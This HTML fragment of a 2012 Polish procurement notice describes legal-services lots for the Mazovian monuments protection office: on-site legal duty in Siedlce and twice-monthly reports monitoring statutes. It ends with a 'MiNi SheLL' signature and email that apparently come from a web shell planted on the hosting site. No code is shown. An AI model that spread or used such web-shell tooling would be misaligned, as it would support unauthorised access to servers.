<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wykonawca zobowiązuje się świadczyć Zamawiającemu usługę prawną w Siedlcach przy ulicy Bema 4A, o charakterze stałym i w  zakresie:
a)	sporządzania opinii prawnych,
b)	realizacji porad prawnych, wyjaśnień i informacji (doradztwa prawnego),
c)	reprezentowania w postępowaniach windykacyjnych i egzekucyjnych w sprawach zleconych indywidualnie,
d)	przygotowania wzorów zarządzeń, pism, decyzji, projektów umów i innych dokumentów i aktów normatywnych dla urzędu
e)	aktywnej pomocy prawnej dla pracowników urzędu, w szczególności rekomendowania zapisów prawnych,
f)	parafowania pod względem formalno-prawnym w szczególności decyzji, umów, zaświadczeń, pozwoleń, pism, zawieranych porozumień i innych dokumentów,
g)	konsultacji telefonicznych i mailowych w pilnych sprawach prawnych z pracownikami urzędu,
h)	udzielania wyjaśnień, sporządzania opinii i analiz prawnych w zakresie objętym  przedmiotem niniejszego zamówienia, w tym w szczególności analiz na gruncie regulacji prawa administracyjnego, ustawy Prawo zamówień publicznych, ustawy o ochronie zabytków, KPA, ustawy o służbie cywilnej, ustawy o służbie cywilnej, ustawy prawo budowlane, ustawy o zagospodarowaniu przestrzennym, ustawy o finansach publicznych, prawa pracy, prawa i postępowania cywilnego, administracyjnego, karnego, postępowania w sprawach o wykroczenia, ustawy o postępowaniu egzekucyjnym w Administracji oraz aktów wykonawczych do tych ustaw,
i)	udział w posiedzeniach stałych i doraźnych komisji:  kontrolnych, oraz w miarę potrzeb w przygotowywaniu postępowań, w szczególności dotyczących zamówień publicznych,

w siedzibie Delegatury Zamawiającego w Siedlcach przy ul. Bema 4A w wymiarze 4 godzin pracy Wykonawcy w tygodniu (16 godzin miesięcznie), prowadzonych w formie dyżurów ustalonych w porozumieniu z Mazowieckim Wojewódzkim Konserwatorem Zabytków. Wykonawca jest zobowiązany do wykonywania usługi osobiście. W szczególności w przypadku braku możliwości uczestniczenia Wykonawcy w wyznaczonym dyżurze jest on zobowiązany do wyznaczenia swojego zastępcy posiadającego tożsame wykształcenie, umiejętności i uprawnienia wskazane w ust. V..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.11.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 0.50</li>
<li>2. doświadczenie w zakresie ochrony zabytków - 0.25</li>
<li>3. doświadczenie w zakresie wykonywania usług prawnych - 0.25</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Wykonawca zobowiązuje się świadczyć Zamawiającemu usługę prawną polegającą na sporządzaniu raportu z monitorowania obszaru prawnego, zgodnie ze specyfikacją i wzorem stanowiącym załącznik nr 9 do SIWZ..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Monitorowane winny być przepisy prawne dotyczące funkcjonowania Wojewódzkiego Urzędu Ochrony Zabytków w Warszawie w zakresie ochrony zabytków, finansów publicznych, prawa pracy, służby cywilnej, kodeksu postępowania administracyjnego, archiwów zakładowych, regulacji o charakterze administracyjnym a w szczególności niżej wskazane uregulowania prawne (wraz z aktami wykonawczymi):
1.	Ustawa o ochronie zabytków i opiece nad zabytkami,
2.	Ustawa o planowaniu i zagospodarowaniu przestrzennym,
3.	Ustawa prawo budowlane,
4.	Ustawa o ochronie przyrody,
5.	Ustawa o gospodarce nieruchomościami,
6.	Ustawa o gospodarowaniu nieruchomościami rolnymi Skarbu Państwa,
7.	Ustawa o ochronie gruntów rolnych i leśnych,
8.	Ustawa o cmentarzach i chowaniu zmarłych,
9.	Ustawa o lasach,
10.	Ustawa o stosunku Państwa do Kościoła katolickiego w Rzeczypospolitej Polskiej,
11.	Ustawa o udostępnianiu informacji o środowisku i jego ochronie, udziale społeczeństwa w ochronie środowiska oraz o ocenach oddziaływania na środowisko,
12.	Ustawa o drogach publicznych,
13.	Ustawa o szczególnych zasadach przygotowania i realizacji inwestycji w zakresie dróg publicznych,
14.	Kodeks postępowania administracyjnego,
15.	Ustawa o opłacie skarbowej,
16.	Ustawa o postępowaniu egzekucyjnym w administracji,
17.	Rozporządzenia Komisji Wspólnoty Europejskiej z zakresu wywozu/eksportu oraz obrotu zabytkami/dobrami kultury,
18.	Kodeks pracy,
19.	Ustawa o służbie cywilnej,
20.	Ustawa o wolontariacie,
21.	Ustawa o ochronie informacji niejawnych,
22.	Ustawa o czasie prasy kierowców,
23.	Prawo zamówień publicznych,
24.	Ustawa o finansach publicznych,
25.	Ustawa o rachunkowości,
26.	Ustawa o rachunkowości budżetowej,
27.	Ustawa o dostępie do informacji publicznej,
28.	Ustawa o ochronie danych osobowych,
29.	Ustawa o administracji rządowej w województwie,
30.	Ustawy o wojewodzie i administracji rządowej w województwie,
31.	Kodeks etyki służby cywilnej,
32.	Przepisy wskazane w części III niniejszego SIWZ,
33.	Inne przepisy dotyczące ochrony zabytków i funkcjonowania Wojewódzkich Urzędów Ochrony Zabytków, 

Częstotliwość raportów: 
Raporty powinny obejmować okres 1 miesiąca, być przygotowane zgodnie ze wzorem wskazanym w załączniku nr 9 do SIWZ, następować po sobie. Raport przesyłany elektronicznie do wyznaczonego pracownika urzędu z Wydziału Organizacyjno-Administracyjnego i dostępny dla wszystkich pracowników urzędu. Raport winien być wysyłany dwa razy w miesiącu: 1 (pierwszy) raport obejmuje 1-15 dni (pierwsze piętnaście dni miesiąca) , drugi raport obejmuje dni od 16 do końca miesiąca. Raport jest wysyłany do urzędu następnego dnia po zakończeniu danego okresu..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.11.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com